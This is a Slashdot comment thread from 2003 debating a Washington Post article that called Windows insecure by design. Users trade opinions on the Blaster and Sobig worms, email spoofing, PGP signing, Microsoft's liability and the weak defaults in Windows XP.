Windows Is 'Insecure By Design,' Says Washington Post

Circuit Breaker writes "A Washington Post article says Microsoft Windows is insecure by design. Quote: 'Between the Blaster worm and the Sobig virus, it's been a long two weeks for Windows users. But nobody with a Mac or a Linux PC has had to lose a moment of sleep over these outbreaks -- just like in earlier "malware" epidemics. This is not a coincidence.'"

Ummm...

[Exitthree]

But nobody with a Mac or a Linux PC has had to lose a moment of sleep over these outbreaks -- just like in earlier "malware" epidemics.

Except the Mac and Linux users in charge of those systems... ;)

Re:Ummm...

[Li0n]

indeed...

I've had to patch and put up to date almost a dozen systems in my free time these weeks. Not seeing one penny for that since they all belong to friends and family... :/

That aside from the bozos at work that got hit and the flood of questions along the lines of "my computer keeps rebooting on me everytime I connect to the Internet... what can it be?..."

And people wonder why techies are grumpy...

Re:Ummm...

[aussersterne]

Not only for that reason.

I don't have Windows anywhere and haven't for several years now. I don't run Outlook. But it turns out that at least one of the current batch of worms spoofs email addresses.

So all week I've been getting email messages from postmaster@ saying "...your message to so-and-so will not be delivered because it contained the SoBig worm, we advise you to download a security update from..." I wrote a couple of them and got two responses from mail admins saying essentially "Yes, we know it spoofs your email, sorry there's nothing we can do, please understand that we're under tons of pressure on our end, everyone is infected, this worm sucks, you have it easy, you run Linux, stop complaining!"

Anyway, people are receiving messages marked "from" my email address and are getting infected with a worm as a result. Obviously one or several people (editors, management, etc.) that have me in their Outlook address books have become infected and now the worm is spreading from their machines and spoofing my email address as the source. I totally resent this and actually worry about my liability.

Do I now have to trademark my own email address or something and then include a disclaimer in my email saying "This email address is my trademark, you are not allowed to add me to your address book in any way"?

The crap Windows security model has certainly affected me, a non-Windows user.

Re:Ummm...

[cybermace5]

Also, don't forget the Mac and Linux users who unfortunately happened to be in the address book of some poor Windows user. I'm about to go nuts from the 50-100 autoreplies from corporate virus scanners, and I know I have it easy.

Re:Ummm...

[theCoder]

"...you have it easy, you run Linux, stop complaining!"

That's when you snap your suspenders, scratch your beard, and remember why you have that smug look on your face :)

Re:Ummm...

[Geek+of+Tech]

And people wonder why techies are grumpy...

Well, yeah, because you know we all make so much money...

Yeah.....

Re:Ummm...

[nikal]

If you digitally signed all of your electronic communication then you could effectively get rid of this worry. People who trusted your key would know immediately that this was a spoof.

Re:Ummm...

[afidel]

PGP sign all your email, that way you will be able to prove that an infecting email did not originate from you. Also the very fact that it is a windows worm and you run Linux should indemnify you.

Re:Ummm...

[Jerf]

To you and nikal, PGP does not prove X did not come from you, it only proves that X did come from you. Even if you are using PGP it is quite easy to send an unsigned message.

Only somebody else's signiture, establishing that it came from them, could begin to establish that it did not come from you, and you would still need to establish that you aren't that somebody else, since having multiple signitures is trivial. (It would probably be reasonably satisfactory under most normal circumstances, though.)

Re:Ummm...

[Deusy]

On the subject of liability, I wonder why Microsoft is never held liabel for the billions of dollars that these incidents cost the world's economies. A little forethought this would never have happened.

Imagine if Ford were to sell a car with a fundamental problem. One that potentially cost lives. They did and they had to recall it.

Now these virus epidemics probably bring down some rather critical computers and potentially cost lives. (Yeah, yeah, mission critical machines should be kept uber patched...)

Microsoft really comes across as untouchable.

Re:Ummm...

[hankaholic]

now the worm is spreading from their machines and spoofing my email address as the source. I totally resent this and actually worry about my liability.

To whomever modded this post up, you have apparently been trolled.

First of all, your fear of liability is irrational. If it is known and documented that a trojan will forge the sender address, and the headers show that the mail was not sent from your ISP, it sounds like you're in the clear. Even if it were sent from your ISP, one would have to show that you controlled that IP at the time the message was sent.

Furthermore, unless you can cite a case in which a user was held responsible for the activities of a trojan running on his or her system, I feel pretty safe in calling you paranoid. Unless you did knowingly spread the trojan, you're fine, except for the aforementioned paranoia.

That aside...

Do I now have to trademark my own email address or something and then include a disclaimer in my email saying "This email address is my trademark, you are not allowed to add me to your address book in any way"?

Nice try.

Too bad you seem to have no clue what trademark actually covers. Contrary to what you seem to believe, owning a trademark does not give you exclusive right to control the use of a certain combination of letters in the Roman alphabet.

This means that Bertelsmann can't do a damned thing about me saying "Bertelsmann" here. Bertelsmann Bertelsmann Bertelsmann. Nor can the RIAA. From the USPTO:

A trademark is a word, phrase, symbol or design, or a combination of words, phrases, symbols or designs, that identifies and distinguishes the source of the goods of one party from those of others.

As long as I'm not using a trademark to mislead people by implying that a product was provided the company which holds that trademark when the product hadn't really been provided by said company, there really isn't a problem.

Go try to register your email address at the USPTO. If you succeed, let me know what it is, and I'll email you letting you know that I heard a story about the Recording Industry Association of America (TM) was suing students from colleges including Princeton University (TM), that I saw the story on MTV's (TM) website, as well as on the news on a Time-Warner (TM) station, and that the students were likely running Microsoft (TM) Windows (TM).

Then I'll invite you to imitate the actions of The SCO Group (TM) and file a lawsuit against me which is destined to do nothing but waste court time.

Hell, you can even forward a copy to each of the companies which own the aforementioned trademarks.

When the court case is thrown out, I'll buy you a cup of coffee at Starbucks (TM), which buys its milk from Horizon Organic Dairy (TM).

Re:Ummm...

[Li0n]

They cease to be liable the moment you click "I Agree"

Re:Ummm...

it's quite simple.
to all future emails,
add the tag line
"All of my email messages are pgp signed.
if you receive an unsigned message
with my address, IT DID NOT COME FROM ME"

Re:Ummm...

[tietokone-olmi]

That's when you start cryptographically signing all of your outgoing mail.

A little bit of public-key cryptography evangelism couldn't hurt, either.

Re:Ummm...

[LinuxGeek]

It dosen't have to be legal liability to cause trouble. A pissed off client, boss or girlfriend can be plenty of liability to have to deal with. If they have trouble understanding the actual causes, then good luck reasoning with them.

Re:Ummm...

[Sandor+at+the+Zoo]

I've had to patch and put up to date almost a dozen systems in my free time these weeks. Not seeing one penny for that since they all belong to friends and family... :/

That's why I tell my family: If you want help with your computer, buy a Mac. I don't support PCs.

Just about everyone in my family has a Mac.

It's a win-win for me, since the amount of support you have to do for a Mac user is virtually nil -- they just work. :-)

Re:Ummm...

[Capsaicin]

They cease to be liable the moment you click "I Agree"

That depends on the various sales of goods statutes of the several jurisdictions in which M$ products are sold. It is not uncommon for such exemption clauses to be explicitly limited or even completely abrogated by legislation.

Re:Ummm...

[johnny0101]

If you were an unscrupulous weasel, then no, putting that at your bottom of the emails would not make it true. But if you *always* sent your mail pgp, then any mail *not* pgp would not be from you. That is what the poster intended to say IMO.
However, you have a valid point, that, say in some sort of legal setting, you would not be able to prove that the mail wasn't from you.

Re:Ummm...

[thx2001r]

Windows security, (don't laugh) on NT 5 and up is not too shabby (when properly done... not to say that it is "secure", no systems plugged into electricity and a network are). The problem is not the security model, it's the default level of security applied out of the box. The default level is so lax, it is WISHING it were swiss cheese!

There are so many open orifices by default, it's, honestly, frightening to release a Windows system to the wild of being connected to the Internet without extensive preventative measures. Of course, keeping safe in a Windows environment is very possible but almost exclusively for technically savvy people, the rest of the Windows users (almost all of them) are running Windows with it's default pants down, bent over, with a giant neon "Rape Me" sign on them.

Sigh. Perhaps someday MS will enable some more of their security features BY DEFAULT on Windows (well, lets say, all of them, and then let users drop their computer's drawers if they choose to). Until then, look at it this way... MS's (deliberate?) default swiss cheese security keeps many a person employed plugging the holes.

If it were secure by default and kept itself in great working order automatically, what use would anyone have paying techies to do that? In a strange way, I owe my continued employment to MS's poor default practices.

Re:Ummm...

[Durandal64]

As sick as defending Microsoft makes me feel, I'm going to have to point out that your analogy isn't fair. A more apt analogy would be Ford making a car with a radio so defective that the car would explode if it received a signal of a certain frequency. Ford learns of this and initiates a recall. People ignore the recall, and then someone hijacks an antenna two weeks after the recall has been initiated and broadcasts said signal of said frequency. Cars explode.

Did Ford send the signal out? No, so they are not directly liable. Did they attempt to correct this problem before it was taken advantage of? Yes. Should such a disastrously massive problem have been allowed to make it into the final design? Microsoft do share some liability for the damage done, but not all of it. It was, after all, their incompetence that created the problem in the first place. Is it all their fault? No, sorry.

The other angle to look at is the cost of installing the patch. Since Windows requires you to reboot after changing all but the most trivial aspects of your system, this makes installing the patch extremely inconvenient for many server administrators. Administrators have no such excuse with a Linux system, which really only requires a reboot after changing the kernel. On Windows boxes, however, such required restarts can end up costing a lot of money, especially if the patch breaks a service that the server is running. So, one thing Microsoft could do would be to reduce the amount of required restarts. Good luck, since the GUI is the operating system, unlike a *nix box, where it's just another process that can be terminated without bringing down the system.

As I said, I now feel sick for sticking up for the pricks in Redmond.

Re:Ummm...

[LetterJ]

I patch regularly, run a hardware firewall and have gotten exactly 1 virus on a computer I own (in 1996 from a floppy disc in a college lab) and even that didn't get off the floppy and I still was affected as I received 1000 infected emails per day at the end of last week as *other* people got infected and sent messages both to and from me without my involvement. Aside from guarding my email address with my life (gee, my customers would love that policy) no amout of due diligence would have prevented the problems I received.

Re:Ummm...

[Tyreth]

I think I'd tend to be a bit heartless. I'd inquire into why they are using windows. If it's necessary, then I'd help them. If it was unecessary, then I'd *strongly* encourage them to use Linux, and ask them why I should waste my time just so they can save time learning something new.

Luckily I haven't had anyone ask me - I guess I don't advertise my computer skills enough :)

Re:Ummm...

[SillySlashdotName]

As well as bashful, sleepy, sneezy, dopey,...

Re:Ummm...

[ball-lightning]

MS is at fault, the root of it, to be sure.

It's kind of funny, but I didn't have any problems with either of those viruses in any of my three WinXP machines. Maybe it was the common sense (Sobig) or the fact all my machines were updated (MS Blaster)or the common sense that 300 e-mails with the same attachment from people I don't know might, just might be a virus. This is not to mention of course the firewall, pestpatrol, and Norton Antivirus. Now, you might say, "well hey, my linux box had none of that, wasn't patched, no firewall, nothin!" but think for a few seconds. These viruses were programed for windows, not linux/any other os. Of course your non-windows computer was not infected, because the virus/worm was not made for it. So before you get on your high horse, remmember it can happen if someone bothers to write it.

Re:Ummm...

[1lus10n]

please please please PLEASE do not reference wired if you wish to garner any kind of respect.

and just for reference (as a person who works hell desk (tech support) for linux servers) i have not yet met a single person affected or infected by slapper. unix and unix derivatives are vastly more secure because of the way they were designed. not to mention most distro's dont leave 45 uneccasary things running by default, hence the admin of a unix box has to do less to be decently secured.

i will admit this virus wasnt particularly microsofts fault. but we have been doing this same routine for 8 -10 years now with them. sooner or latter they are going to have to own up to it, and yes microsofts systems are inherintly insecure. and no i dont run anything M$ on anything i own or admin.

i am also very aware that i am having a bad spelling day.

Re:Ummm...

[andreMA]

Yes, so very many of them:

• Sunday, October 06, 2002 10:08:43 US/Pacific: Installed "Security Update 2002-09-20" (1.0)
• Sunday, October 06, 2002 10:09:19 US/Pacific: Installed "Internet Explorer 5.2 Security Update" (5.2.2)
• Sunday, October 06, 2002 10:21:30 US/Pacific: Installed "Mac OS X Update" (10.2.1)
• Friday, February 14, 2003 18:31:25 US/Eastern: Installed "Mac OS X Update" (10.2.4)
• Friday, March 07, 2003 17:43:42 US/Eastern: Installed "Security Update 2003-03-03" (1.0)
• Sunday, March 30, 2003 22:10:29 US/Eastern: Installed "Security Update 2003-03-24" (1.0)
• Saturday, April 12, 2003 13:35:20 US/Eastern: Installed "Mac OS X Update" (10.2.5)
• Tuesday, May 13, 2003 14:28:01 US/Eastern: Installed "Mac OS X Update" (10.2.6)
• Tuesday, June 10, 2003 12:52:53 US/Eastern: Installed "Security Update 2003-06-09" (1.0)
• Sunday, June 22, 2003 15:12:53 US/Eastern: Installed "Security Update 2003-06-09" (2.0)
• Thursday, July 24, 2003 15:30:54 US/Eastern: Installed "Security Update 2003-07-14" (1.0)

This includes security updates and point-revisions of the OS (which one might presume to have less-critical security updates rolled into them), and excludes application specific updates for the i-App suite, Safari, etc. that were not labelled as "Security" related (one might assert that they were in fact security related, but they included point-upgrades to the applications as well. Those toatlled perhaps 8-10 updates over the span covered). Note that two (Stuffit! and IE) are for 3rd-party bundled apps with labelled "Security" updates.

yes, I'm aware that I haven't installed the latest one to patch the off-by-one bug that impacts the FTP server. I'm waiting until I need to reboot for some other reason.

TOTAL UPDATES OVER THE PAST 10 MONTHS: 5. 7 if you count patches to 3rd party apps, one of which was IE. 10 if you're really liberal and include the point-revisions of the OS too.

Please tell me where these "lot of security updates in the past 6 months" are... I'm not seeing them.

Re:Ummm...

[dtfinch]

Unfortunately, I live in the poorest town in the poorest county in the poorest state in the USA. We have a nearby University pumping out moderately skilled CS grads who either move away or compete in a small economy, where most employers see $10 an hour as a fair starting wage for programmers. But the scenery is great, and family is nearby.

Re:Ummm...

[oliphaunt]

why not offer them a choice?

I'll help you move to linux for free, or I'll charge you $50 to fix your system this time.

tell them the charge will double each time they need help, for either system.

Re:Ummm...

[caouchouc]

Your suggestion has some merit, but it involves the Outlook users installing and learning to use some public key encryption implimentation like GPG.

For most, this process is completely out of the question. These are the same people who can't be bothered to apply patches or switch to a much less frequently compromised e-mail client.
These people aren't going to change their habits unless actually forced. It's either that or something needs to be implimented that will transparently protect them from themselves with 100% effectiveness (AV software is useful and all, but it has obviously failed in this regard).

Right now, the only viable defense is vigilance.

Re:Ummm...

[dabootsie]

Full headers of the e-mail in question would indemnify you, as the originating IP is added by the first SMTP server to deal with the message and can't be spoofed by the client.

Re:Ummm...

[ball-lightning]

please please please PLEASE do not reference wired if you wish to garner any kind of respect.

ok

And I wouldn't surprised if Longhorn had built-in virus protection. Not only would it make the OS less susceptible to viruses/worms/etc, but it would also be a nice revenue stream for Microsoft (like they'd give away the definitions for free, maybe bundle them with windows patches) And just for the record, the last virus I actually got was the Italien A virus (an old dos virus).

Re:Ummm...

[togtog]

The one difference would be this;

Two months after that recall Ford issues a recall for steering wheels, that they can crack and make it hard to control the car. Three months later they issue a recall for their electric adjusted seats which when hit by a certain radio signal fold forward on the occupants of the car. Then only one month after that they issue another for the radio again, this time if playing any old CD the radio may emit a really loud tone until disconnected. Then five months after that they issue a recall for their A/C in which the improper placement in relation to the engine of a connecting hose that can cause it to start burning emitting a nasty smoke unless the A/C is turned off. Two months later a recall is done for door locks that when jarred (such as slapping the door or slamming it) may unlock it coupled with Fords new Easy Go(tm) keyless one button start feature.

It's not just one recall, it is a long history of problems one after another. Some from their own stupidity, some from the stupidity of others.

The only thing that could save Microsoft would be a total rewrite of windows to go back to the 3.1 daze of a GUI and an OS as you mention. Unix does it, Linux does it, and Apple now does it (yuck, defending Apple, *vomits and then ducks*).

I doubt we will see a rewrite any time soon however, for one thing it would be a shit load of work, take a long time, probably be as filled with bugs and holes as the current generation of Microsoft products for at least the first year or more, and probably break all current software, might as well save it for the 64bit processors.

Sorry for the lack of grammar *ducks again*, cheers!

-tog

Re:Ummm...

[xQx]

wow, 10USD per hour... life must be tough.

The average family wage in australia is $10.50 USD per hour. ($35,000AUD / 2000Hours * 60c)

Tell me, how do they cope?

Re:Ummm...

[shepd]

>Tell me, how do they cope?

Dunno, but the difference is due to the very low GDP for Australia vs. the very high GDP for the USA. The accounts for the difference in wages between many different countries.

In the US itself, though, there are places where $10 US an hour is well below poverty and you would be expected to drift from shelter to shelter (Parts of California), and also places where $10 US an hour will make you rich (Alaska?).

The US is quite strange like that.

Re:Ummm...

[Jondor]

Off course the next windows will have virusprotection. MS just bought an anti-virus company. But.. are those people who don't patch update the datafiles? And will MS have the data available in time and correct?
And ofcourse, for years to come a lot of people will be perfectly happy with older version of windows..
So don't have your hopes up. Besides, now that everybody (ahum) is protected we don't have to fix IE and outlook anymore, do we?

Re:Ummm...

[MickLinux]

Nope. Don't do it that way. You're liable to promote Linux to their system, and yourself into homelessness.

---

Use a proper business model:

"Okay, my first charge for help is going to be $100 -- $50 for one hour of help, and another $50 for a second HDD, installing a dual-boot Debian Linux on your computer. At that point, you have a choice about which system you want to boot into, and it will make it easier for me to disk-image your Windows system directories, and fix your problems. One thing, though: keep all your program CDs in one place for quick reinstall; your programs installed in c:\my programs; your downloaded programs in c:\my downloads\programs; and all your documents stored somewhere under c:\mydocuments. That will keep things simple for me, and cheap for you.

"After that, I'll charge $50/hr for service, but it will be a ton cheaper, because I'll often simply restore the image of your OS directory. Indeed, I'll show you how to do it.

---

Quite honestly, as they get used to using Linux, they'll start to forget Windows. I know I did. It's still on my system. Eventually, though, I had to completely reformat my Win98 HDD and reinstall. This time, the reinstall for some reason never gave me Word, which was in the original software set, and I can't figure out how to get it [and it is one of my main reasons for keeping Windows around.] But interestingly, with the reinstall, I ended up doing it a second time and installing almost nothing, but lo and behold, my HP DJ1120c print driver, which used to crash on the loaded system, still crashes on the empty system, and now it's clear that it is an OS bug, since it crashes other things, too. So my other major reason for keeping Windows around, a better print driver, is also bogus.

Well, as people start to realize this stuff, they're going to drop Windows on their own. And you're not going to make yourself poor, servicing them for free.

Re:Ummm...

[Cederic]

>> this virus wasnt particularly microsofts fault

If you're talking Sobig.F then yes, it is definitely Microsoft's fault.

In the early 1990s, people got laughed at (or gently educated) if they suggested 'I got that virus through email'. It just didn't happen.

Then MS turn up with their inherently insecure 'Automatically run stuff that's emailed to you' email client, actually build it into the OS (thus ensuring greater take-up than would otherwise have been achieved) and email viruses became commonplace.

The only way this virus wasn't Microsoft's fault is that they didn't write it themselves. The environment it runs in, that enabled it, is entirely and absolutely due to insecure design by MS.

~Cederic

Re:Ummm...

[mindriot]

Well, but given a simple look in the mail headers, you can well prove that the infected mail did not come from you.

I recently got a load of Failure Notices to my University mail account that claimed the mail I had sent was infected with a virus (I think it was an earlier SoBig variant). Well, the notice included the header of the original email, which in turn included the Received: line I was looking for.

The guy's computer (in another dorm) was denied net access by the computer center after my mail to their abuse handler until he proved to the net admins in his dorm that his box was clean again.

In short: to anyone who asks you, you can effectively prove the mail did not come from you. Unless, of course, you're in via some dialup provider which happens to be the same the sender of the virus mail used; that makes it a bit harder.

Re:Ummm...

[Cederic]

Email viruses for a long time couldn't be prevented by the end user, if that user was using Outlook/Outlook Express.

If I get an attachment called 'summary.txt' then I tend to assume it's a text file, and will view it to see its contents. In OE it may actually have been 'summary.txt.pif', an executable virus. A system that allows that mistake to happen has inherent design flaws.

For the record, that's one reason I've never used Outlook Express. I use mail systems that tell me what I've received, and that will handle attachments in the manner I expect.

Calling people 'stoopids' may make you feel superior, but doesn't alter the insecurity of the design of many MS products.

A lot of users are ignorant. There are solutions to that problem that don't include introducing a whole new class of virus (email viruses), or leaving systems open to remote attack (e.g. MSBlast) by default.

~Cederic

Re:Ummm...

[BigBir3d]

The Washington Post article implies that OS X or linux is by default 100% secure. Most of us here at slashdot know that to be untrue.

1 per month is a fairly small number, I agree. But for your average clueless user... "I just did that last month, now I have to do it again? I thought I bought an iMac so I didn't have to do this anymore..."

Re:Ummm...

[jonadab]

Exchange rates don't mirror cost of living, necessarily. The Aussie
buck isn't worth as much as the US buck on the international market,
but that isn't because the Aussie buck won't buy as much, locally,
as the US buck will buy in the US.

An example: the exchange rate between where I live (Galion Ohio)
and lower Manhattan is 1:1 -- one dollar from here is worth exactly
one dollar from there. Yet, an entire family here can live on less
money per month than the rent of a two-room apartment there.

The exchange rates do have an impact on the cost of living, as they
have an impact on the cost of some items, but not everything is
priced proportionally.

Here, $10/hour is a decent wage for a single person in a blue-collar
or entry-level position. I take home about that amount after taxes,
working as an entry-level computer troubleshooter (basically, a
one-man part-time IT department at a place too small to have a
full-time IT department), but a professional programmer would
certainly make more than that (except, I doubt if we have any in
the area). Fourty minutes' drive south of here there's a big
white-collar area (Worthington/Westerville, suburbs of Columbus --
conference complexes, marketing firms, shopping malls, and
three-quarter-million-dollar houses[1] as far as the eye can see)
where someone in a position equivalent to mine would make triple
my wage and struggle to get along. Rent is much higher there;
food costs more; everything costs more. A lot of people live up
this way and commute to work down there.

[1] Nobody would build a house that expensive in Galion, because
it wouldn't have resale value. We have a sparse handful of
houses in town worth two hundred thousand or a little more.
Part of it is that the land here is much cheaper.

Re:Ummm...

[jonadab]

> yeah actually since we are on the topic it is woz's fault for
> making computers accessable

Herring. Dark pink. Outlook Express is *less* accessible to the
end user, *harder* to learn to use, than other email clients that
existed sooner (e.g., Pegasus Mail). Yet in the history of
computing Outlook is the *only* known, documented case of any email
application being the medium for transmission of a virus. There
is absolutely *zero* reason for a mailreader to behave the way it
does (automatically executing received content); other mailreaders
that are even easier to use don't do it that way, because there is
no *reason* to do it that way. Of all Microsoft programs ever,
no other is so much a plague and a nuissance as Outlook. Without
reservation I can say that the world would be a better place if
Outlook had never been developed.

Re:Ummm...

[Prior+Restraint]

Another thing people seem to forget is that when Microsoft first announced this functionality, the op-eds were full of warnings that email viruses were just around the corner. Microsoft's position at the time was that the benefits would outweigh any theorhetical risk.

Re:Ummm...

[FiskeBoller]

Worse than that ... at the time I worked for Microsoft, I spoke out about the feature becoming used for virus transmission. This statement was made directly to Balmer in a room of 400 developers ... and the room went silent.

Nothing was ever done about the issue.

Re:Ummm...

[pmz]

Well, yeah, because you know we all make so much money...

I am literally a millionaire and own loads of property in New York. However, I simply don't know why the bank teller keeps saying, "Sir, Parker Brothers is not a part of the U.S. Treasury, and we cannot exchange this money for you." This liquidity problem is really keeping me from living the lifestyle I worked so hard for. The world is so unfair.

Re:Ummm...

[bhtooefr]

I can just imagine that:

"Outlook Express will have automatically running scripts!"

"DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS!"

"This is a COOL feature!"

"DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS!"

"But won't automatically running scripts will be used for virus transmissions?"

*silence*

Well, you did say it was in a room of 400 developers! Did you not?

Good point, muddled way of expressing it

[Raindance]

There's a large difference between "Windows is insecure by design" and "Windows was not designed to be secure or with security in mind" just as there's a significant difference between saying "Impalas are deathtraps by design" and "Impalas were not designed with safety in mind".

That said, and though the Post's article was a little muddled in general I agree with the spirit of the article in that
1). It's reprehensible that Microsoft apparently didn't have security (a broad term, but the literature to define it is out there) as a guiding design principle when they designed Windows, and
2) As a result of this, Items central to the functioning of Windows do not lend themselves to good security.

Re:Good point, muddled way of expressing it

[the+Man+in+Black]

I didn't take that phrase that way until I read your post. The writer isn't stating that Windows engineers designed the OS to be insecure, he's stating that the way Windows was designed lends itself to insecurity. Two different takes on the phrase "by design". Slightly misleading, sure, but he clarifies in the article, so it's cred by me. I particularly like the comparisons he makes with Windows, OS X, and Red Hat's default install.

Re:Good point, muddled way of expressing it

[rekkanoryo]

The problems with Windows are largely what was pointed out in the article:

• Users complain they don't trust Microsoft and don't apply Critical Updates
• XP's firewall is off by default and takes at least five steps to turn on
• XP leaves five ports open by default--three of them are 137, 138, and 139, the NetBIOS over TCP/IP ports

I have the following to say on those issues, however:

• If users don't trust that Microsoft can patch a hole, they shouldn't use Windows and shouldn't buy PCs preconfigured with Windows, no matter how crappy the software availability and quality for the alternatives
• For the XP Home software, all dialup interfaces should have the firewall on by default. XP can automatically detect broadband connections as well, so on broadband internet connections the firewall should also be on by default
• Ports 137 through 139 should be disabled by default until file sharing is turned on. And even then, those ports should be specifically closed on all internet-facing interfaces. The port that console messages are sent on should be closed to the internet-facing interfaces as well, and probably just closed period on Home since console messages are supposed to be used by administrators in domain environments

These are not the only problems with Windows, nor are these solutions I propose going to be 100% fool-proof. But most of the problem comes to users' carelessness or naivete. By turning off all the unimportant messages in XP such as

• Get a Passport
• Take a tour of Windows XP

should wait until after more important, security-related messages such as

• If you choose to use Windows Automatic Updates, your computer will automatically update itself with the latest security patches. This will ensure fewer problems and enhanced reliability while your computer is connected to the Internet. Click here to learn more.
• If this computer will be directly attached to the Internet through either a dial-up modem, a cable modem, or a DSL modem, you should enable the Internet Connection Firewall by clicking here and following the instructions. The firewall will help protect your computer from hackers and self-spreading worms on the Internet, keeping your computer working properly much longer.

It's simple steps like these that, on top of proper security considerations and testing when designing and writing the code, will help protect users and the net in general from what we suffer right now.

Re:Good point, muddled way of expressing it

[PygmySurfer]

XP's firewall is off by default and takes at least five steps to turn on

I seem to recall XP's firewall being turned on during the inital "Welcome to Windows" wizard that pops up after installation, if you choose the option "This machine will be directly connected to the internet" (Or something like that).

That being said, I always turned the firewall OFF, it was too much of a pain to set up additional ports to allow.

Since then, I've moved to a Mac, and OS X's firewall is much easier to configure.

I certainly agree with the rest of your points though (and the majority of the article).

Re:Good point, muddled way of expressing it

[El]

It's reprehensible that Microsoft apparently didn't have security (a broad term, but the literature to define it is out there) as a guiding design principle when they designed Windows

You're assuming that Windows was designed, and didn't just evolve from a quick and dirty rip-off of CP/M by adding more and more Unix-like features. I have a favorite saying: "Anything that's backwards compatible with a kluge is, by definition, a kluge." Remember, supporting multiple users was an afterthought for Windows!

Re:Good point, muddled way of expressing it

[dhogaza]

Do keep in mind that at major papers like the Post reporters don't write the headlines. Just as they don't decide where their story will run (or if it will run), how big the type used for the head will be, whether or not there will be a subhead, etc.

So don't ding the reporter for the slightly misleading headline. Sounds like the reporter got it right in the part he or she wrote - the article.

Re:Good point, muddled way of expressing it

[hankaholic]

Fair enough, but many people may opt not to download updates because of their rediculous size.

Under Debian, at least, if a package is found to have a security hole, I have several options.

I can download only the affected package. Of course, since it's Debian, I can always opt to just bring the whole system up to date. If bandwidth is really a problem, I can even manually rsync an older local copy of the package against the updated version upstream.

Unfortunately, rsync isn't done by apt-get automatically, but the option to do it manually is there, as many Debian mirrors do support rsync.

The point is, though, that with Linux and the BSDs, you can find out exactly what you're downloading, and determine exactly what effect the new package will have. With XP, you might have no idea what you're getting. Spending eight hours downloading MS updates when you don't know what you're getting isn't something most people consider worthwhile, especially when it's often the case that after updating Windows, it's found that there have been refinements to the updates that just occurred, and so Windows wants to download yet more stuff, and reboot yet again!

People want to use their systems, not maintain them. As long as the MS "critical updates" take ages to download and often create the need for further updates, people will continue to ignore the "Windows updates are available" messages.

Rebooting is a lot to ask. Large downloads are a lot to ask. If I were to install all of the "important" updates available to Windows at the moment, it would require several reboots, especially since many components can't be installed at the same time. Under Debian, not even one reboot would be required, unless the kernel were updated. Under Windows, if I update Media Player, a reboot is required, and Windows won't even let me update other things at the same time!

I'm just glad I'm behind a firewall.

Re:Good point, muddled way of expressing it

[1010011010]

Well, he could have mentioned a true "Insecure by Design" flaw in Windows: the fact that Windows determines that a file is executable based on its *name*. If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

On Unix and unix-like systems, one has to explicitly mark a file as executable before ths OS will try to run it, and it's even possible to deny the "execute" permission to an entire filesystem (for instance, users' read-write home directories).

Re:Good point, muddled way of expressing it

[rekkanoryo]

Microsoft already bought an antivirus maker a few months back. Read about it here.

I think Microsoft would find itself in an undefendable position were it to integrate a feature such as antivirus directly into Windows. That would be using monopoly powers to stifle competition, and I think DOJ would throw a fit over it. Many OEMs already bundle antivirus software. HP and Compaq bundle both Norton and McAffee, I seem to recall Dell bundling Norton, and I know eMachines bundles McAfee (not installed by default, though).

Re:Good point, muddled way of expressing it

[rabidcow]

If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

Not only that, it goes and hides that part of the name by default, so most people won't get a warning that the file will be executed.

it's even possible to deny the "execute" permission to an entire filesystem

You can actually deny execute permission on a drive (or any file/folder) in Windows as well, but since that's shared with folder traversal it may not be feasable. (and I doubt that's available in "Home" editions...) It might work if you go and enable it for all folders specifically (and not thier content), but that would get extremely tedious.

Unless...

[Chemical+Serenity]

... you count the *nix administrators who had to scramble to put in antivirus software on the corporate mail server to stem the tide of 50k+ virus mails per day.

On the plus side, if you work as a contractor, it's billable hours. :D GG SoBillable^H^H^H^H^H^H^HSoBig!

95% a target perhaps?

[koniosis]

Funny how 95% of PC users have Windows, I wonder why a Virus writer would want to target Windows??!? Perhaps that is why so many exploits are found, because people are targeting it religously, start targeting Mac and Linux as much and see who is insecure!

Re:95% a target perhaps?

[Borg_5x8]

Agreed. I'm not trolling, but one could argue that noone cares enough about macs or linux to target them with viruses. :P

Re:95% a target perhaps?

what about web server worms? apache is much more used than iis, but this didn't help iis...

Re:95% a target perhaps?

[justsomebody]

Funny, you say that. That excuse is getting to its old age.

But it makes a great difference (on Windows) right in a moment after you:
step1) Disable Internet Connection to Explorer and Outlook (almost no one virus can connect to internet to download it's other part or upgrade, because they mostly use ActiveX download object)
step2) Start using Mozilla or Opera or even better Thunderbird and Firebird (in this step you disable IFrame and OCX viruses)
step3) Teach users not to open .pif and .vbs (Here you stop user interaction for virus to be downloaded)

Problem with Windows is not 95%, but IE and Outlook are made as centerpart of the system, thus allowed to any action no matter how stupid it is.

Based on that: YES, Windows is insecure in its roots.

Re:95% a target perhaps?

[Liselle]

Give me a break. Linux (and Mac) don't have a huge share of desktops, but more and more companies (the kind of companies you want to hack and steal credit card numbers from) are running Linux-based servers. The source code for Linux is on millions of computers, naked to the world.

I learned about preventing buffer-overruns when I was in high school. This "most computers are running Windows" excuse for viruses is a cop-out, plain and simple.

Re:95% a target perhaps?

Mac and Linux users tend not to use Outlook for reading mail, they also tend not to run as root. Of those 95% Windows users, how many read html mail with scripting enabled while logged into the admin acount? It's Microsofts fault because they are targeting people who know nothing about computers and shipping insecure default configuration.

Re:95% a target perhaps?

[evn]

The size of the windows audience has something to with the sheer number of viruses & worms, but that doesn't mean that mean that BSD/Mac OS/Linux are automatically just as insecure as Windows. Microsoft hasn't exactly gone out of it's way to ensure that users are safe and secure (not to the extent that OpenBSD has anyway)

Furthermore, *NIX has a massive presence in the server closets of the world. A worm that/virus that exploited these systems could be very lucrative for a malicious individual.
- Stealing corporate data (so we could find out who exactly SCO buys the stuff McBride is smoking from)
- DDoS attacks with OC-3 (rather than DSL/Dialup/Cable)
- Spam directly from the mail servers

There are certainly good reasons to write *NIX worms/viruses, but I think a combination of cluefull administration, a well designed OS, and to (a smaller extent) obscurity work together to make them a particularly hard target (when compared with Windows)

Re:95% a target perhaps?

[lpret]

I think this has to do more wiht the type of user we are talking about here. Joe Sixpack doesn't know anything about computers and thus uses Windows. Then we blame him when his computer has a worm. Well, if JS used Linux he wouldn't update his system either.

